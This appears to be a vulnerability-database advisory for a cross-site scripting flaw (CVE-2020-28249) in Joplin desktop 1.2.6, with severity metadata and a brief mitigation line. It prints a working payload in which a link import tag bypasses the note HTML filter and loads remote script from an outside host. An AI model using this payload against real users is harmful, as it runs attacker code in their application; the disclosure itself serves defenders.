vendor:
Joplin
by:
Philip Holbrook
6.1
CVSS
MEDIUM
Cross Site Scripting
79
CWE
Product Name: Joplin
Affected Version From: 1.2.6
Affected Version To: 1.2.6
Patch Exists: YES
Related CWE: CVE-2020-28249
CPE: a:laurent_22:joplin:1.2.6
Metasploit:
N/A
Other Scripts:
N/A
Platforms Tested: Windows, Mac
2020
Joplin 1.2.6 – ‘link’ Cross Site Scripting
An XSS issue in Joplin for desktop v1.2.6 allows a link tag in a note to bypass the HTML filter. The payload for the exploit is <link rel=import href="data:text/html,<script>alert(XSS)</script> <script src="//brutelogic.com.br/1.js# </script>
Mitigation:
Ensure that all user-supplied input is properly sanitized and filtered before being used in the application.